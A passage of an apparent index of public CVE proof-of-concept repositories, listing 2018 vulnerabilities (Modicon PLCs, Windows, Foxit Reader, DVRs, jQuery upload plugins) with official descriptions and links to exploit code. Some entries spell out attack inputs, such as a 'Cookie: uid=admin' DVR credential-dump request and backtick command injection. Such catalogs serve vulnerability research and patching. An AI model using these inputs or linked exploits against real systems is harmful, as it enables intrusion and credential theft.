A CWE-290: Authentication Bypass by Spoofing vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause an elevation of privilege by conducting a brute force attack on Modbus parameters sent to the controller.

- [yanissec/CVE-2018-7842](https://github.com/yanissec/CVE-2018-7842)

### CVE-2018-7843 (2019-05-22)

A CWE-248: Uncaught Exception vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause denial of service when reading memory blocks with an invalid data size or with an invalid data offset in the controller over Modbus.

- [yanissec/CVE-2018-7843](https://github.com/yanissec/CVE-2018-7843)

### CVE-2018-7844 (2019-05-22)

A CWE-200: Information Exposure vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause the disclosure of SNMP information when reading memory blocks from the controller over Modbus.

- [yanissec/CVE-2018-7844](https://github.com/yanissec/CVE-2018-7844)

### CVE-2018-7845 (2019-05-22)

A CWE-125: Out-of-bounds Read vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause the disclosure of unexpected data from the controller when reading specific memory blocks in the controller over Modbus.

- [yanissec/CVE-2018-7845](https://github.com/yanissec/CVE-2018-7845)

### CVE-2018-7846 (2019-05-22)

A CWE-501: Trust Boundary Violation vulnerability on connection to the Controller exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum and Modicon Premium which could cause unauthorized access by conducting a brute force attack on Modbus protocol to the controller.

- [yanissec/CVE-2018-7846](https://github.com/yanissec/CVE-2018-7846)

### CVE-2018-7848 (2019-05-22)

A CWE-200: Information Exposure vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause the disclosure of SNMP information when reading files from the controller over Modbus.

- [yanissec/CVE-2018-7848](https://github.com/yanissec/CVE-2018-7848)

### CVE-2018-7849 (2019-05-22)

A CWE-248: Uncaught Exception vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause a possible denial of service due to an improper data integrity check when sending files to the controller over Modbus.

- [yanissec/CVE-2018-7849](https://github.com/yanissec/CVE-2018-7849)

### CVE-2018-7852 (2019-05-22)

A CWE-248: Uncaught Exception vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause denial of service when an invalid private command parameter is sent to the controller over Modbus.

- [yanissec/CVE-2018-7852](https://github.com/yanissec/CVE-2018-7852)

### CVE-2018-7854 (2019-05-22)

A CWE-248: Uncaught Exception vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause a denial of service when sending invalid debug parameters to the controller over Modbus.

- [yanissec/CVE-2018-7854](https://github.com/yanissec/CVE-2018-7854)

### CVE-2018-7935 (2023-02-10)

There is a vulnerability in version 21.328.01.00.00 of the E5573Cs-322. Remote attackers could exploit this vulnerability to make the network where the E5573Cs-322 is running temporarily unavailable.

- [lawrenceamer/CVE-2018-7935](https://github.com/lawrenceamer/CVE-2018-7935)

### CVE-2018-8004 (2018-08-29)

There are multiple HTTP smuggling and cache poisoning issues when clients making malicious requests interact with Apache Traffic Server (ATS). This affects versions 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. To resolve this issue users running 6.x should upgrade to 6.2.3 or later versions and 7.x users should upgrade to 7.1.4 or later versions.

- [mosesrenegade/CVE-2018-8004](https://github.com/mosesrenegade/CVE-2018-8004)

### CVE-2018-8021 (2018-11-07)

Versions of Superset prior to 0.23 used an unsafe load method from the pickle library to deserialize data leading to possible remote code execution. Note Superset 0.23 was released prior to any Superset release under the Apache Software Foundation.

- [r3dxpl0it/Apache-Superset-Remote-Code-Execution-PoC-CVE-2018-8021](https://github.com/r3dxpl0it/Apache-Superset-Remote-Code-Execution-PoC-CVE-2018-8021)

### CVE-2018-8032 (2018-08-02)

Apache Axis 1.x up to and including 1.4 is vulnerable to a cross-site scripting (XSS) attack in the default servlet/services.

- [cairuojin/CVE-2018-8032](https://github.com/cairuojin/CVE-2018-8032)

### CVE-2018-8033 (2018-12-13)

In Apache OFBiz 16.11.01 to 16.11.04, the OFBiz HTTP engine (org.apache.ofbiz.service.engine.HttpEngine.java) handles requests for HTTP services via the /webtools/control/httpService endpoint. Both POST and GET requests to the httpService endpoint may contain three parameters: serviceName, serviceMode, and serviceContext. The exploitation occurs by having DOCTYPEs pointing to external references that trigger a payload that returns secret information from the host.

- [Cappricio-Securities/CVE-2018-8033](https://github.com/Cappricio-Securities/CVE-2018-8033)

### CVE-2018-8038 (2018-07-05)

Versions of Apache CXF Fediz prior to 1.4.4 do not fully disable Document Type Declarations (DTDs) when either parsing the Identity Provider response in the application plugins, or in the Identity Provider itself when parsing certain XML-based parameters.

- [tafamace/CVE-2018-8038](https://github.com/tafamace/CVE-2018-8038)

### CVE-2018-8039 (2018-07-02)

It is possible to configure Apache CXF to use the com.sun.net.ssl implementation via 'System.setProperty("java.protocol.handler.pkgs", "com.sun.net.ssl.internal.www.protocol");'. When this system property is set, CXF uses some reflection to try to make the HostnameVerifier work with the old com.sun.net.ssl.HostnameVerifier interface. However, the default HostnameVerifier implementation in CXF does not implement the method in this interface, and an exception is thrown. However, in Apache CXF prior to 3.2.5 and 3.1.16 the exception is caught in the reflection code and not properly propagated. What this means is that if you are using the com.sun.net.ssl stack with CXF, an error with TLS hostname verification will not be thrown, leaving a CXF client subject to man-in-the-middle attacks.

- [tafamace/CVE-2018-8039](https://github.com/tafamace/CVE-2018-8039)

### CVE-2018-8045 (2018-03-14)

In Joomla! 3.5.0 through 3.8.5, the lack of type casting of a variable in a SQL statement leads to a SQL injection vulnerability in the User Notes list view.

- [luckybool1020/CVE-2018-8045](https://github.com/luckybool1020/CVE-2018-8045)

### CVE-2018-8060 (2018-05-10)

HWiNFO AMD64 Kernel driver version 8.98 and lower allows an unprivileged user to send an IOCTL to the device driver. If input and/or output buffer pointers are NULL or if these buffers' data are invalid, a NULL/invalid pointer access occurs, resulting in a Windows kernel panic aka Blue Screen. This affects IOCTLs higher than 0x85FE2600 with the HWiNFO32 symbolic device name.

- [otavioarj/SIOCtl](https://github.com/otavioarj/SIOCtl)

### CVE-2018-8062 (2020-10-23)

A cross-site scripting (XSS) vulnerability on Comtrend AR-5387un devices with A731-410JAZ-C04_R02.A2pD035g.d23i firmware allows remote attackers to inject arbitrary web script or HTML via the Service Description parameter while creating a WAN service.

- [OscarAkaElvis/CVE-2018-8062](https://github.com/OscarAkaElvis/CVE-2018-8062)

### CVE-2018-8065 (2018-03-12)

An issue was discovered in the web server in Flexense SyncBreeze Enterprise 10.6.24. There is a user mode write access violation on the syncbrs.exe memory region that can be triggered by rapidly sending a variety of HTTP requests with long HTTP header values or long URIs.

- [EgeBalci/CVE-2018-8065](https://github.com/EgeBalci/CVE-2018-8065)

### CVE-2018-8078 (2018-03-13)

YzmCMS 3.7 has Stored XSS via the title parameter to advertisement/adver/edit.html.

- [Jx0n0/YZMCMSxss](https://github.com/Jx0n0/YZMCMSxss)

### CVE-2018-8090 (2018-07-25)

Quick Heal Total Security 64 bit 17.00 (QHTS64.exe), (QHTSFT64.exe) - Version 10.0.1.38; Quick Heal Total Security 32 bit 17.00 (QHTS32.exe), (QHTSFT32.exe) - Version 10.0.1.38; Quick Heal Internet Security 64 bit 17.00 (QHIS64.exe), (QHISFT64.exe) - Version 10.0.0.37; Quick Heal Internet Security 32 bit 17.00 (QHIS32.exe), (QHISFT32.exe) - Version 10.0.0.37; Quick Heal AntiVirus Pro 64 bit 17.00 (QHAV64.exe), (QHAVFT64.exe) - Version 10.0.0.37; and Quick Heal AntiVirus Pro 32 bit 17.00 (QHAV32.exe), (QHAVFT32.exe) - Version 10.0.0.37 allow DLL Hijacking because of Insecure Library Loading.

- [kernelm0de/CVE-2018-8090](https://github.com/kernelm0de/CVE-2018-8090)

### CVE-2018-8097 (2018-03-14)

io/mongo/parser.py in Eve (aka pyeve) before 0.7.5 allows remote attackers to execute arbitrary code via Code Injection in the where parameter.

- [SilentVoid13/CVE-2018-8097](https://github.com/SilentVoid13/CVE-2018-8097)

### CVE-2018-8108 (2018-03-14)

The select component in bui through 2018-03-13 has XSS because it performs an escape operation on already-escaped text, as demonstrated by workGroupList text.

- [zlgxzswjy/BUI-select-xss](https://github.com/zlgxzswjy/BUI-select-xss)

### CVE-2018-8115 (2018-05-02)

A remote code execution vulnerability exists when the Windows Host Compute Service Shim (hcsshim) library fails to properly validate input while importing a container image, aka "Windows Host Compute Service Shim Remote Code Execution Vulnerability." This affects Windows Host Compute.

- [aquasecurity/scan-cve-2018-8115](https://github.com/aquasecurity/scan-cve-2018-8115)

### CVE-2018-8120 (2018-05-09)

An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows Server 2008, Windows 7, Windows Server 2008 R2. This CVE ID is unique from CVE-2018-8124, CVE-2018-8164, CVE-2018-8166.

- [bigric3/cve-2018-8120](https://github.com/bigric3/cve-2018-8120)
- [rip1s/CVE-2018-8120](https://github.com/rip1s/CVE-2018-8120)
- [ne1llee/cve-2018-8120](https://github.com/ne1llee/cve-2018-8120)
- [alpha1ab/CVE-2018-8120](https://github.com/alpha1ab/CVE-2018-8120)
- [EVOL4/CVE-2018-8120](https://github.com/EVOL4/CVE-2018-8120)
- [ozkanbilge/CVE-2018-8120](https://github.com/ozkanbilge/CVE-2018-8120)
- [qiantu88/CVE-2018-8120](https://github.com/qiantu88/CVE-2018-8120)
- [Y0n0Y/cve-2018-8120-exp](https://github.com/Y0n0Y/cve-2018-8120-exp)
- [StartZYP/CVE-2018-8120](https://github.com/StartZYP/CVE-2018-8120)
- [wikiZ/cve-2018-8120](https://github.com/wikiZ/cve-2018-8120)

### CVE-2018-8172 (2018-07-11)

A remote code execution vulnerability exists in Visual Studio software when the software does not check the source markup of a file for an unbuilt project, aka "Visual Studio Remote Code Execution Vulnerability." This affects Microsoft Visual Studio, Expression Blend 4.

- [SyFi/CVE-2018-8172](https://github.com/SyFi/CVE-2018-8172)

### CVE-2018-8174 (2018-05-09)

A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka "Windows VBScript Engine Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

- [0x09AL/CVE-2018-8174-msf](https://github.com/0x09AL/CVE-2018-8174-msf)
- [Yt1g3r/CVE-2018-8174_EXP](https://github.com/Yt1g3r/CVE-2018-8174_EXP)
- [SyFi/CVE-2018-8174](https://github.com/SyFi/CVE-2018-8174)
- [orf53975/Rig-Exploit-for-CVE-2018-8174](https://github.com/orf53975/Rig-Exploit-for-CVE-2018-8174)
- [piotrflorczyk/cve-2018-8174_analysis](https://github.com/piotrflorczyk/cve-2018-8174_analysis)
- [likekabin/CVE-2018-8174-msf](https://github.com/likekabin/CVE-2018-8174-msf)
- [ruthlezs/ie11_vbscript_exploit](https://github.com/ruthlezs/ie11_vbscript_exploit)
- [ericisnotrealname/CVE-2018-8174_EXP](https://github.com/ericisnotrealname/CVE-2018-8174_EXP)
- [www201001/https-github.com-iBearcat-CVE-2018-8174_EXP](https://github.com/www201001/https-github.com-iBearcat-CVE-2018-8174_EXP)
- [www201001/https-github.com-iBearcat-CVE-2018-8174_EXP.git-](https://github.com/www201001/https-github.com-iBearcat-CVE-2018-8174_EXP.git-)
- [delina1/CVE-2018-8174](https://github.com/delina1/CVE-2018-8174)
- [delina1/CVE-2018-8174_EXP](https://github.com/delina1/CVE-2018-8174_EXP)
- [DarkFlameMaster-bit/CVE-2018-8174_EXP](https://github.com/DarkFlameMaster-bit/CVE-2018-8174_EXP)
- [lisinan988/CVE-2018-8174-exp](https://github.com/lisinan988/CVE-2018-8174-exp)
- [sinisterghost/https-github.com-iBearcat-CVE-2018-8174_EXP](https://github.com/sinisterghost/https-github.com-iBearcat-CVE-2018-8174_EXP)

### CVE-2018-8208 (2018-06-14)

An elevation of privilege vulnerability exists in Windows when Desktop Bridge does not properly manage the virtual registry, aka "Windows Desktop Bridge Elevation of Privilege Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8214.

- [kaisaryousuf/CVE-2018-8208](https://github.com/kaisaryousuf/CVE-2018-8208)

### CVE-2018-8214 (2018-06-14)

An elevation of privilege vulnerability exists in Windows when Desktop Bridge does not properly manage the virtual registry, aka "Windows Desktop Bridge Elevation of Privilege Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8208.

- [guwudoor/CVE-2018-8214](https://github.com/guwudoor/CVE-2018-8214)

### CVE-2018-8284 (2018-07-11)

A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly, aka ".NET Framework Remote Code Injection Vulnerability." This affects Microsoft .NET Framework 2.0, Microsoft .NET Framework 3.0, Microsoft .NET Framework 4.6.2/4.7/4.7.1/4.7.2, Microsoft .NET Framework 4.5.2, Microsoft .NET Framework 4.6, Microsoft .NET Framework 4.7/4.7.1/4.7.2, Microsoft .NET Framework 4.7.1/4.7.2, Microsoft .NET Framework 3.5, Microsoft .NET Framework 3.5.1, Microsoft .NET Framework 4.6/4.6.1/4.6.2, Microsoft .NET Framework 4.6/4.6.1/4.6.2/4.7/4.7.1/4.7.1/4.7.2, Microsoft .NET Framework 4.7.2.

- [quantiti/CVE-2018-8284-Sharepoint-RCE](https://github.com/quantiti/CVE-2018-8284-Sharepoint-RCE)

### CVE-2018-8353 (2018-08-15)

A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka "Scripting Engine Memory Corruption Vulnerability." This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-8355, CVE-2018-8359, CVE-2018-8371, CVE-2018-8372, CVE-2018-8373, CVE-2018-8385, CVE-2018-8389, CVE-2018-8390.

- [whereisr0da/CVE-2018-8353-POC](https://github.com/whereisr0da/CVE-2018-8353-POC)

### CVE-2018-8389 (2018-08-15)

A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka "Scripting Engine Memory Corruption Vulnerability." This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-8353, CVE-2018-8355, CVE-2018-8359, CVE-2018-8371, CVE-2018-8372, CVE-2018-8373, CVE-2018-8385, CVE-2018-8390.

- [sharmasandeepkr/cve-2018-8389](https://github.com/sharmasandeepkr/cve-2018-8389)

### CVE-2018-8410 (2018-09-13)

An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory, aka "Windows Registry Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

- [trapmine/CVE-2018-8410](https://github.com/trapmine/CVE-2018-8410)

### CVE-2018-8414 (2018-08-15)

A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths, aka "Windows Shell Remote Code Execution Vulnerability." This affects Windows 10 Servers, Windows 10.

- [whereisr0da/CVE-2018-8414-POC](https://github.com/whereisr0da/CVE-2018-8414-POC)

### CVE-2018-8420 (2018-09-13)

A remote code execution vulnerability exists when the Microsoft XML Core Services MSXML parser processes user input, aka "MS XML Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

- [idkwim/CVE-2018-8420](https://github.com/idkwim/CVE-2018-8420)

### CVE-2018-8440 (2018-09-13)

An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC), aka "Windows ALPC Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

- [sourceincite/CVE-2018-8440](https://github.com/sourceincite/CVE-2018-8440)

### CVE-2018-8453 (2018-10-10)

An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

- [Mkv4/cve-2018-8453-exp](https://github.com/Mkv4/cve-2018-8453-exp)
- [ze0r/cve-2018-8453-exp](https://github.com/ze0r/cve-2018-8453-exp)
- [thepwnrip/leHACK-Analysis-of-CVE-2018-8453](https://github.com/thepwnrip/leHACK-Analysis-of-CVE-2018-8453)

### CVE-2018-8495 (2018-10-10)

A remote code execution vulnerability exists when Windows Shell improperly handles URIs, aka "Windows Shell Remote Code Execution Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers.

- [whereisr0da/CVE-2018-8495-POC](https://github.com/whereisr0da/CVE-2018-8495-POC)

### CVE-2018-8581 (2018-11-14)

An elevation of privilege vulnerability exists in Microsoft Exchange Server, aka "Microsoft Exchange Server Elevation of Privilege Vulnerability." This affects Microsoft Exchange Server.

- [WyAtu/CVE-2018-8581](https://github.com/WyAtu/CVE-2018-8581)
- [qiantu88/CVE-2018-8581](https://github.com/qiantu88/CVE-2018-8581)
- [Ridter/Exchange2domain](https://github.com/Ridter/Exchange2domain)

### CVE-2018-8587 (2018-12-12)

A remote code execution vulnerability exists in Microsoft Outlook software when it fails to properly handle objects in memory, aka "Microsoft Outlook Remote Code Execution Vulnerability." This affects Office 365 ProPlus, Microsoft Office, Microsoft Outlook.

- [Sunqiz/CVE-2018-8587-reproduction](https://github.com/Sunqiz/CVE-2018-8587-reproduction)

### CVE-2018-8611 (2018-12-12)

An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka "Windows Kernel Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

- [lsw29475/CVE-2018-8611](https://github.com/lsw29475/CVE-2018-8611)

### CVE-2018-8617 (2018-12-12)

A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8583, CVE-2018-8618, CVE-2018-8624, CVE-2018-8629.

- [bb33bb/cve-2018-8617-aab-r-w-](https://github.com/bb33bb/cve-2018-8617-aab-r-w-)

### CVE-2018-8639 (2018-12-12)

An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8641.

- [ze0r/CVE-2018-8639-exp](https://github.com/ze0r/CVE-2018-8639-exp)
- [timwhitez/CVE-2018-8639-EXP](https://github.com/timwhitez/CVE-2018-8639-EXP)

### CVE-2018-8718 (2018-03-27)

Cross-site request forgery (CSRF) vulnerability in the Mailer Plugin 1.20 for Jenkins 2.111 allows remote authenticated users to send unauthorized mail as an arbitrary user via a /descriptorByName/hudson.tasks.Mailer/sendTestMail request.

- [GeunSam2/CVE-2018-8718](https://github.com/GeunSam2/CVE-2018-8718)

### CVE-2018-8820 (2018-03-28)

An issue was discovered in Square 9 GlobalForms 6.2.x. A Time Based SQL injection vulnerability in the "match" parameter allows remote authenticated attackers to execute arbitrary SQL commands. It is possible to upgrade access to full server compromise via xp_cmdshell. In some cases, the authentication requirement for the attack can be met by sending the default admin credentials.

- [hateshape/frevvomapexec](https://github.com/hateshape/frevvomapexec)

### CVE-2018-8897 (2018-05-08)

A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A; section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL < 3, the debug exception is delivered after the transfer to CPL < 3 is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs.

- [nmulasmajic/CVE-2018-8897](https://github.com/nmulasmajic/CVE-2018-8897)
- [jiazhang0/pop-mov-ss-exploit](https://github.com/jiazhang0/pop-mov-ss-exploit)
- [can1357/CVE-2018-8897](https://github.com/can1357/CVE-2018-8897)
- [nmulasmajic/syscall_exploit_CVE-2018-8897](https://github.com/nmulasmajic/syscall_exploit_CVE-2018-8897)

### CVE-2018-8941 (2018-04-03)

Diagnostics functionality on D-Link DSL-3782 devices with firmware EU v. 1.01 has a buffer overflow, allowing authenticated remote attackers to execute arbitrary code via a long Addr value to the 'set Diagnostics_Entry' function in an HTTP request, related to /userfs/bin/tcapi.

- [SECFORCE/CVE-2018-8941](https://github.com/SECFORCE/CVE-2018-8941)

### CVE-2018-8947 (2018-03-25)

rap2hpoutre Laravel Log Viewer before v0.13.0 relies on Base64 encoding for l, dl, and del requests, which makes it easier for remote attackers to bypass intended access restrictions, as demonstrated by reading arbitrary files via a dl request.

- [scopion/CVE-2018-8947](https://github.com/scopion/CVE-2018-8947)

### CVE-2018-8970 (2018-03-24)

The int_x509_param_set_hosts function in lib/libcrypto/x509/x509_vpm.c in LibreSSL 2.7.0 before 2.7.1 does not support a certain special case of a zero name length, which causes silent omission of hostname verification, and consequently allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate. NOTE: the LibreSSL documentation indicates that this special case is supported, but the BoringSSL documentation does not.

- [tiran/CVE-2018-8970](https://github.com/tiran/CVE-2018-8970)

### CVE-2018-9059 (2018-04-20)

Stack-based buffer overflow in Easy File Sharing (EFS) Web Server 7.2 allows remote attackers to execute arbitrary code via a malicious login request to forum.ghp. NOTE: this may overlap CVE-2014-3791.

- [manojcode/easy-file-share-7.2-exploit-CVE-2018-9059](https://github.com/manojcode/easy-file-share-7.2-exploit-CVE-2018-9059)

### CVE-2018-9075 (2018-09-28)

For some Iomega, Lenovo, LenovoEMC NAS devices versions 4.1.402.34662 and earlier, when joining a PersonalCloud setup, an attacker can craft a command injection payload using backtick "``" characters in the client:password parameter. As a result, arbitrary commands may be executed as the root user. The attack requires a value __c and iomega parameter.

- [beverlymiller818/cve-2018-9075](https://github.com/beverlymiller818/cve-2018-9075)

### CVE-2018-9160 (2018-03-31)

SickRage before v2018.03.09-1 includes cleartext credentials in HTTP responses.

- [mechanico/sickrageWTF](https://github.com/mechanico/sickrageWTF)

### CVE-2018-9206 (2018-10-11)

Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0.

- [Den1al/CVE-2018-9206](https://github.com/Den1al/CVE-2018-9206)
- [Stahlz/JQShell](https://github.com/Stahlz/JQShell)
- [cved-sources/cve-2018-9206](https://github.com/cved-sources/cve-2018-9206)
- [mi-hood/CVE-2018-9206](https://github.com/mi-hood/CVE-2018-9206)

### CVE-2018-9207 (2018-11-19)

Arbitrary file upload in jQuery Upload File <= 4.0.2.

- [cved-sources/cve-2018-9207](https://github.com/cved-sources/cve-2018-9207)

### CVE-2018-9208 (2018-11-05)

Unauthenticated arbitrary file upload vulnerability in jQuery Picture Cut <= v1.1Beta.

- [cved-sources/cve-2018-9208](https://github.com/cved-sources/cve-2018-9208)

### CVE-2018-9276 (2018-07-02)

An issue was discovered in PRTG Network Monitor before 18.2.39. An attacker who has access to the PRTG System Administrator web console with administrative privileges can exploit an OS command injection vulnerability (both on the server and on devices) by sending malformed parameters in sensor or notification management scenarios.

- [wildkindcc/CVE-2018-9276](https://github.com/wildkindcc/CVE-2018-9276)
- [andyfeili/CVE-2018-9276](https://github.com/andyfeili/CVE-2018-9276)
- [alvinsmith-eroad/CVE-2018-9276](https://github.com/alvinsmith-eroad/CVE-2018-9276)

### CVE-2018-9375
- [IOActive/AOSP-ExploitUserDictionary](https://github.com/IOActive/AOSP-ExploitUserDictionary)

### CVE-2018-9411
- [tamirzb/CVE-2018-9411](https://github.com/tamirzb/CVE-2018-9411)

### CVE-2018-9468
- [IOActive/AOSP-DownloadProviderHijacker](https://github.com/IOActive/AOSP-DownloadProviderHijacker)

### CVE-2018-9493 (2018-10-02)

In the content provider of the download manager, there is a possible SQL injection due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9.0. Android ID: A-111085900.

- [IOActive/AOSP-DownloadProviderDbDumper](https://github.com/IOActive/AOSP-DownloadProviderDbDumper)

### CVE-2018-9539 (2018-11-14)

In the ClearKey CAS descrambler, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9. Android ID: A-113027383

- [tamirzb/CVE-2018-9539](https://github.com/tamirzb/CVE-2018-9539)

### CVE-2018-9546
- [IOActive/AOSP-DownloadProviderHeadersDumper](https://github.com/IOActive/AOSP-DownloadProviderHeadersDumper)

### CVE-2018-9948 (2018-05-17)

This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 9.0.0.29935. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of typed arrays. The issue results from the lack of proper initialization of a pointer prior to accessing it. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5380.

- [manojcode/Foxit-Reader-RCE-with-virualalloc-and-shellcode-for-CVE-2018-9948-and-CVE-2018-9958](https://github.com/manojcode/Foxit-Reader-RCE-with-virualalloc-and-shellcode-for-CVE-2018-9948-and-CVE-2018-9958)
- [orangepirate/cve-2018-9948-9958-exp](https://github.com/orangepirate/cve-2018-9948-9958-exp)

### CVE-2018-9950 (2018-05-17)

This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 9.0.0.29935. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF documents. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5413.

- [sharmasandeepkr/PS-2017-13---CVE-2018-9950](https://github.com/sharmasandeepkr/PS-2017-13---CVE-2018-9950)

### CVE-2018-9951 (2018-05-17)

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.0.29935. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of CPDF_Object objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5414.

- [sharmasandeepkr/cve-2018-9951](https://github.com/sharmasandeepkr/cve-2018-9951)

### CVE-2018-9958 (2018-05-17)

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.1049. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Text Annotations. When setting the point attribute, the process does not properly validate the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5620.

- [t3rabyt3-zz/CVE-2018-9958--Exploit](https://github.com/t3rabyt3-zz/CVE-2018-9958--Exploit)

### CVE-2018-9995 (2018-04-10)

TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response.

- [ezelf/CVE-2018-9995_dvr_credentials](https://github.com/ezelf/CVE-2018-9995_dvr_credentials)
- [zzh217/CVE-2018-9995_Batch_scanning_exp](https://github.com/zzh217/CVE-2018-9995_Batch_scanning_exp)
- [Huangkey/CVE-2018-9995_check](https://github.com/Huangkey/CVE-2018-9995_check)
- [gwolfs/CVE-2018-9995-ModifiedByGwolfs](https://github.com/gwolfs/CVE-2018-9995-ModifiedByGwolfs)
- [shacojx/cve-2018-9995](https://github.com/shacojx/cve-2018-9995)
- [Cyb0r9/DVR-Exploiter](https://github.com/Cyb0r9/DVR-Exploiter)
- [codeholic2k18/CVE-2018-9995](https://github.com/codeholic2k18/CVE-2018-9995)
- [TateYdq/CVE-2018-9995-ModifiedByGwolfs](https://github.com/TateYdq/CVE-2018-9995-ModifiedByGwolfs)
- [ABIZCHI/CVE-2018-9995_dvr_credentials](https://github.com/ABIZCHI/CVE-2018-9995_dvr_credentials)
- [MrAli-Code/CVE-2018-9995_dvr_credentials](https://github.com/MrAli-Code/CVE-2018-9995_dvr_credentials)
